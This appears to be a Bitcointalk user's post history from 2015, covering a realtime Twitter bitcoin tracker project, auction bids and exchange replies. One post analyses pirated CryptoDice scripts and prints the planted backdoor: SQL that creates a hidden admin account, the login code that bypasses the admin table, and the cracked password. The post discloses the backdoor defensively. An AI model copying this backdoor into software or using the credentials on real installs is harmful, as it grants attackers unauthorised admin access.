Bitcoin Forum
May 26, 2024, 08:11:57 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19 20 21 22 23 24 25 26 »
261  Bitcoin / Project Development / Re: [ANN] cryptoparrot.com - realtime twitter bitcoin tracker on: November 11, 2015, 10:52:08 AM
There seems to be a lot of robot and MMM spam.

yes unfortunately its a lot of spam. I am thinking about filtering it out (already have the code finished for spam-detect). Do you think its better to remove them from the real-time tweets and instead just keep them inside the coming statistics and counter??
I guess, as they still mention Bitcoin (just don't have any value). Do whatever feels right man, it's your project. Tongue


 Cool Well i am trying to make it as comfortable as possible (not only for me but especially for the community). So every piece of community-feedback is worth gold for the project.

But thinking about the spam problem it may be the best to add a 3rd button next to play/pause named "noSpam". So its in the users hand..
262  Bitcoin / Project Development / Re: [ANN] cryptoparrot.com - realtime twitter bitcoin tracker on: November 11, 2015, 10:45:51 AM
There seems to be a lot of robot and MMM spam.

yes unfortunately its a lot of spam. I am thinking about filtering it out (already have the code finished for spam-detect). Do you think its better to remove them from the real-time tweets and instead just keep them inside the coming statistics and counter??
263  Bitcoin / Project Development / Re: [ANN] cryptoparrot.com - realtime twitter bitcoin tracker on: November 11, 2015, 10:42:07 AM
Hey,

Like your site and idea useful to see the rate in which #bitcoin is tweeted, would be good if you could select to show the last 20, 40 or 50 tweets and some stats on the amount #bitcoin has been tweeted over the last hour or day or so.

thank you for the feedback. Day statistic (RT, tweets) and day count is in work already. I will extend it to 7d, d and 1h. Your idea to archive the last x tweets sounds very good to me. I will add this to the milestones and add it very soon. thank you.
264  Bitcoin / Project Development / Re: [ANN] cryptoparrot.com - realtime twitter bitcoin tracker on: November 11, 2015, 08:09:06 AM
update: I modified the layout and optimized the application for vertical and horizontal view on mobile devices. Currently now finishing some tests on a new fuzzy-search algorithm for bitcoin realtime tracking of also similar sentences and social network expressions.
Will update the new layout-version after the test.
265  Bitcoin / Project Development / Re: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts on: November 11, 2015, 08:02:02 AM
I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

i cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advice anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...

266  Economy / Currency exchange / Re: Selling BTC need WU on: November 11, 2015, 07:43:01 AM
I want to sell BTC for WU 50-100eur not more.
I will send first to green trusted
I will pay fee on pick up
1:1 rate

To which country? And may i ask where are the bitcoins coming from?

Wow. Never heard anything like this.
Actually i have not btc for sale at the moment, but couldnt skip this question. What do you mean where it is comming from? Whats the difference?
At least 70% of all our bitcoins are related to silk market but i am not calling anyone drug dealer. So simple answer would be: it is comming from my personal wallet.

I have to declare where my money is coming from before sending it via WU (at least here in CH/DE/AT). And i have to declare why i am sending it (purpose). Its just my right to ask where the BTCs are from. You don't have to answer...
And you are right - it wouldn't make a difference regarding the BTCs at all. But it makes a huge difference to potential business-partners (for this request). At least on my side.

Well but from what you just posted you don't even have BTCs for sale(?). So just lock this thread as it makes no sense to keep it open.

267  Economy / Currency exchange / Re: Selling BTC need WU on: November 10, 2015, 07:18:57 PM
I want to sell BTC for WU 50-100eur not more.
I will send first to green trusted
I will pay fee on pick up
1:1 rate

To which country? And may i ask where are the bitcoins coming from?
268  Economy / Auctions / Re: PROFIT BOT v1.05 on: November 09, 2015, 07:18:01 PM
Free Bot Sample Here:http://megabitload.com/download/index/85762677/ No Competition To Profit Bot.

so you giving the bot away for free??


to all other readers: WARNING: NEVER CLICK ON LINKS FROM UNKNOWN SOURCES!
269  Economy / Auctions / Re: Selling a Website/APP for Bitcoin on: November 07, 2015, 11:42:04 PM
myBitWorth.com - What are your bitcoins worth?
http://myBitWorth.com

As seen here: https://bitcointalk.org/index.php?topic=318306.0

MyBitWorth.com allows you to watch multiple BTC addresses, enter general btc entries and follow their profit/loss/value, and import a Securities portfolio to see your total BTC worth in the currency of your choice.  Set the currency and exchange, and you can keep an eye on your holdings 24/7! There are no logins and no information is stored on our server.

Auction is for the whole site, source code, graphics, etc, and domains.

The site has several hundred regular users, makes a bit on donations now and then, but nothing much.

This was a proof of concept developed to see if there was demand for an app or more specialized service. There was definitely a decent demand and support for the community for this type of thing, but I don't have the time or funds to take it to the next level. It is a few years old, and could easily be made into an app for revenue.

The price is a steal, there's a lot of coding and effort in this site.

Domains:
myBitworth.com - expires 3-23-2016
bitworth.net - expires 10-26-2015

Auction Terms
Price Start: BTC .25
Minimum Increment: BTC .01
Buy It Now: BTC 1


Auction ends 24 hrs after Last Bid

Escrow is fine, but buyer pays.

Quote
bitworth.net - expires 10-26-2015

is this a typo or does the auction "include" a expired domain? And can you please provide some traffic-information? e.g. Whats avg. daily visits (unique, returning)? When have you launched? How is traffic looking for the timeframe since launch?
270  Economy / Auctions / Re: Lealana Silver Auction on: November 06, 2015, 07:55:06 AM
0.283BTC
271  Economy / Auctions / Re: [Auction] Casascius 2013 Silver Single + Silver / Gilt - Starts @ 2BTC! on: November 06, 2015, 07:44:31 AM
4.2BTC
272  Economy / Auctions / Re: Lealana Silver Auction on: November 06, 2015, 07:42:57 AM
0.273BTC
273  Economy / Auctions / Re: [Auction] Casascius 2013 Silver Single + Silver / Gilt - Starts @ 2BTC! on: November 06, 2015, 12:19:29 AM
3.95 BTC
274  Economy / Auctions / Re: [Auction] Casascius 2013 Silver Single + Silver / Gilt - Starts @ 2BTC! on: November 05, 2015, 11:52:40 PM
3.85 BTC
275  Economy / Auctions / Re: Lealana Silver Auction on: November 05, 2015, 11:41:21 PM
0.26 BTC
276  Bitcoin / Project Development / Re: bitcointalk android on: November 05, 2015, 11:07:43 PM
I've seen this topic thanks to @Muhammed Zakir's post in the Meta section:
https://bitcointalk.org/index.php?topic=1009402.msg11117578#msg11117578

Anyone know if the Elbandi bitcointalk app it's working well and if it's secure?
Thanks!

As like every other third party application, none can say what will happen with any data transferred through the application, including authentication process, general-data input, r/w access to local storage, and so on and so on. As long its not a official application and not open-source, nobody can answer this question. One first test can be sniff packets from the application to look if its uses secured sockets connection or not. Really hard testing include hexa-debug of application and memory-analysis.
277  Bitcoin / Project Development / Re: [ANN] cryptoparrot.com - realtime twitter bitcoin tracker on: November 03, 2015, 04:23:17 PM
I have to say that it very nice written codes of less than 100 lines for that... not sure if this sounds good but perhaps could you make it a bit slower in terms of showing new tweets each time as it's very fast and before I try to read the whole tweet, it's gone and also maybe you could add other bitcoin related keywords as well but in separate windows on the same page as well

Thank you for the input/feedback. I have added the play and pause buttons for this case. So you can click pause and it will stop.
The reason why it is so fast is that its in realtime. When i add a timeout then i have a problem that it will queue the other tweets. And after some time (for example 24h) the cryptoparrot.com will have a delay in the message of maybe even many minutes/hours... So i think its better when we let it in realtime. So you really also see it in realtime.

I like the idea of adding other tabs for other bitcoin related keywords.. maybe from financial and economic perspective. What do you think are keyword which make sense to add.
278  Local / Projektentwicklung / cryptoparrot.com - Echtzeit Bitcoin-Tracker on: November 03, 2015, 03:24:54 PM
Werte Communitymitglieder,

ich stelle euch mein neues Projekt http://www.cryptoparrot.com vor. Diese reaktive Echtzeit-Anwendung listet die letzten 10 tweets welche das Wort "bitcoin" beinhalten. Ihr könnt es testen indem ihr einen Tweet mit dem Wort "bitcoin" verfasst. Der Tweet wird sofort auf cryptoparrot.com angezeigt. Hierbei handelt es sich um Beta-Software. Ich werde demnächst weitere Funktionen hinzufügen:

#Statistiken
#Counter
#Spam-Filter
#Twitter-Auth


Für die Entwicklung von cryptoparrot.com habe ich weniger als 100 Zeilen Code verwendet was wiederum für die Leistungsfähigkeit und Stabilität von nodeJS und meteor spricht.  

Für Feedback und Rückmeldung bin ich dankbar.

gruß,
ca333
279  Bitcoin / Project Development / [ANN] cryptoparrot.com - realtime twitter bitcoin tracker on: November 03, 2015, 02:55:49 PM
Hello community,

i launched my new site http://www.cryptoparrot.com which shows last 10 tweets containing the
word "bitcoin" in realtime. Its from the live-stream and you can check it by making a tweet and mention the word "bitcoin". You will see it in realtime on cryptoparrot.com immediately. Cryptoparrot.com is fully reactive and realtime this means you can view it on your smartphone (vertical view optimized) and on computer with same output in realtime.This is the beta version. Below is a listing of the milestones i will add to the application.

#7d, day and 1h statistics (RT, tweets) - community request from batesresearch
#tweet counter
#visual-statistics
#spam-filter (robotcoingame and others)
#add twitter authentication so user can retweet, tweet from within the cryptoparrot.com

#custom keywords to track

this webapplication is also built to show how stable and powerfull the nodeJS and the meteorJS frameworks are.
I developed cryptoparrot.com with <100 lines of code.

ca333
280  Economy / Auctions / Re: ❎ Auction for FORTY 2013 0.1 BTC Brass Coins - Start bid = 0.01BTC on: November 02, 2015, 02:16:05 PM
i bid 0.38 BTC
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19 20 21 22 23 24 25 26 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!